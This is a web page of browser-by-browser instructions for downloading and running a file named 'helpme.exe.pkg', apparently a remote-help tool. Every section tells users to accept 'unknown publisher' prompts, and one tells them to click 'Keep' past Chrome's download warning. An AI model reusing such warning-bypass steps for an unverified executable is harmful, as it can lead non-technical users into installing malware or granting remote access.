Opera Install Instructions

First Opera will ask where you want to save it, similar to the image below

Click on Save and Opera will start the download

The download will continue in the top right corner, Once it says "Download complete" Double click on helpme.exe.pkg

The installer will start to run, you'll get a prompt asking if you want an app from an unknown publisher making changes to the computer, click yes and the installer will do everything else

Firefox Install Instructions

First firefox will ask if you want to save the file, like the image below

Click on Save and firefox will start the download

The download will continue in the top right corner, Once it finishes downloading Click on helpme.exe.pkg

The installer will start to run, you'll get a prompt asking if you want an app from an unknown publisher making changes to the computer, click yes and the installer will do everything else

Safari Install Instructions

First Safari will ask if you want to save the file, like the image below

Click on Save and Safari will start the download

The download will continue in the top right corner, Once it finishes downloading Click on helpme.exe.pkg

The installer will start to run, you'll get a prompt asking if you want to run the application click yes and the installer will do everything else

Internet Explorer Install Instructions

First at the bottom of the page, Internet Explorer will ask if you want to run or save the file, like the image below

Click on Run and Internet Explorer will start the download

The download will continue in the bottom bar, Once it finishes downloading the installer will start to run, you'll get a prompt asking if you want an app from an unknown publisher making changes to the computer, click yes and the installer will do everything else

Edge Install Instructions

First at the bottom of the page, Edge will ask if you want to save the file, like the image below

Click on Save and Edge will start the download

The download will continue in the bottom bar, Once it finishes downloading Click on Run

The installer will then start to run, you'll get a prompt asking if you want an app from an unknown publisher making changes to the computer, click yes and the installer will do everything else

Chrome Install Instructions

The download for the tool should have started now, it will be at the bottom of your browser and look like so:

Click on this and chrome will run the installer for you

(If it shows the following message, click on the "Keep" button)

When the installer starts to run, you'll get a prompt asking if you want an app from an unknown publisher making changes to the computer, click yes and the installer will do everything else

Undetected Browser

You're currently using a browser which has not been detected, in which case the recomendation is that you download the file by slecting save (if its an option), and then going into your downloads folder and double clicking on the file called "helpme.exe.pkg", the installer will do the rest for you
